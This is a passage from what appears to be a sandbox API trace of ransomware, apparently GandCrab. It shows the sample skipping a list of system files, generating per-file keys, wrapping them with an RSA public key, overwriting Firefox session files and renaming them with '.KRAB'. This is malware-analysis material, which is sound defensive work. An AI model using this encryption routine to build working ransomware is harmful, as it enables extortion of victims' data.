lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*" [0083.228] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x10235f8 [0083.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.228] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.228] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.228] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0083.228] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0083.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock" [0083.228] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.228] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 129 [0083.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\d2ca4a08d2ca4dee3d.lock") returned 124 [0083.229] lstrlenW (lpString=".lock") returned 5 [0083.229] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.229] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0083.229] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.229] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.230] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.230] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.230] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.230] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\KRAB-DECRYPT.txt" [0083.230] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.230] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\KRAB-DECRYPT.txt.KRAB") returned 122 [0083.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\KRAB-DECRYPT.txt") returned 117 [0083.230] lstrlenW (lpString=".txt") returned 4 [0083.230] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.230] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.231] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\KRAB-DECRYPT.txt") returned 117 [0083.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\KRAB-DECRYPT.txt") returned 117 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.231] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.231] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.232] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.232] lstrcmpW (lpString1="previous.js", lpString2=".") returned 1 [0083.232] lstrcmpW (lpString1="previous.js", lpString2="..") returned 1 [0083.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="previous.js" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js" [0083.232] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.232] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js.KRAB") returned 117 [0083.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0083.232] lstrlenW (lpString=".js") returned 3 [0083.232] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.232] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".js ") returned 4 [0083.233] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0083.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js") returned 112 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="desktop.ini") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="autorun.inf") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="ntuser.dat") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="iconcache.db") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="bootsect.bak") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="boot.ini") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="ntuser.dat.log") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="thumbs.db") returned -1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="KRAB-DECRYPT.html") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="ntldr") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="NTDETECT.COM") returned 1 [0083.233] lstrcmpiW (lpString1="previous.js", lpString2="Bootfont.bin") returned 1 [0083.234] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.234] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1010930) returned 1 [0083.238] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.239] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.239] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.239] CryptGenRandom (in: hProv=0x1010930, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0083.239] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0083.239] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.239] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x10114e0) returned 1 [0083.297] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.298] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.298] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.298] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0083.298] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0083.298] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.299] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011678) returned 1 [0083.303] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1022ff8) returned 1 [0083.303] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0083.303] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0083.303] GetLastError () returned 0x0 [0083.303] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.303] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0083.304] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1010b50) returned 1 [0083.305] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1022ff8) returned 1 [0083.305] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0083.305] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0083.306] GetLastError () returned 0x0 [0083.306] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.306] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0083.306] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\previous.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0083.307] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.307] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.308] ReadFile (in: hFile=0x718, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0x29d43, lpOverlapped=0x0) returned 1 [0083.336] SetFilePointerEx (in: hFile=0x718, liDistanceToMove=0xfffd62bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.336] WriteFile (in: hFile=0x718, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x29d43, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0x29d43, lpOverlapped=0x0) returned 1 [0083.337] WriteFile (in: hFile=0x718, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0083.337] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.341] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.342] CloseHandle (hObject=0x718) returned 1 [0083.342] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.342] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\previous.js"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\previous.js.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\previous.js.krab")) returned 1 [0083.343] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.343] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.344] lstrcmpW (lpString1="upgrade.js-20170518000419", lpString2=".") returned 1 [0083.344] lstrcmpW (lpString1="upgrade.js-20170518000419", lpString2="..") returned 1 [0083.344] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\", lpString2="upgrade.js-20170518000419" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419" [0083.344] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.344] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419.KRAB") returned 131 [0083.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0083.344] lstrlenW (lpString=".js-20170518000419") returned 18 [0083.344] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.344] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".js-20170518000419 ") returned 19 [0083.345] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.345] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0083.345] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419") returned 126 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="desktop.ini") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="autorun.inf") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="ntuser.dat") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="iconcache.db") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="bootsect.bak") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="boot.ini") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="ntuser.dat.log") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="thumbs.db") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="KRAB-DECRYPT.html") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="ntldr") returned 1 [0083.345] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="NTDETECT.COM") returned 1 [0083.346] lstrcmpiW (lpString1="upgrade.js-20170518000419", lpString2="Bootfont.bin") returned 1 [0083.346] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.346] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1011678) returned 1 [0083.347] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.348] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.348] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.348] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0083.348] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0083.348] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.349] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x10111b0) returned 1 [0083.350] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.351] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.351] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.355] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0083.355] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0083.355] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.355] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011348) returned 1 [0083.357] CryptImportKey (in: hProv=0x1011348, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1022ff8) returned 1 [0083.357] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0083.357] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0083.357] GetLastError () returned 0x0 [0083.357] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.357] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0083.357] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011678) returned 1 [0083.359] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1022ff8) returned 1 [0083.359] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0083.359] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0083.359] GetLastError () returned 0x0 [0083.359] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.359] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0083.360] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0083.360] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.360] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.361] ReadFile (in: hFile=0x718, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0xa9b2, lpOverlapped=0x0) returned 1 [0083.412] SetFilePointerEx (in: hFile=0x718, liDistanceToMove=0xffff564e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.412] WriteFile (in: hFile=0x718, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa9b2, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0xa9b2, lpOverlapped=0x0) returned 1 [0083.412] WriteFile (in: hFile=0x718, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0083.412] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.419] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.420] CloseHandle (hObject=0x718) returned 1 [0083.420] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.420] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\sessionstore-backups\\upgrade.js-20170518000419.krab")) returned 1 [0083.421] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.421] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0083.422] FindClose (in: hFindFile=0x10235f8 | out: hFindFile=0x10235f8) returned 1 [0083.422] CloseHandle (hObject=0x7ec) returned 1 [0083.422] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0083.422] lstrcmpW (lpString1="sessionstore.js", lpString2=".") returned 1 [0083.422] lstrcmpW (lpString1="sessionstore.js", lpString2="..") returned 1 [0083.422] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js" [0083.422] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.422] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js.KRAB") returned 100 [0083.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore.js") returned 95 [0083.422] lstrlenW (lpString=".js") returned 3 [0083.422] VirtualAlloc (lpAddress=0x0, 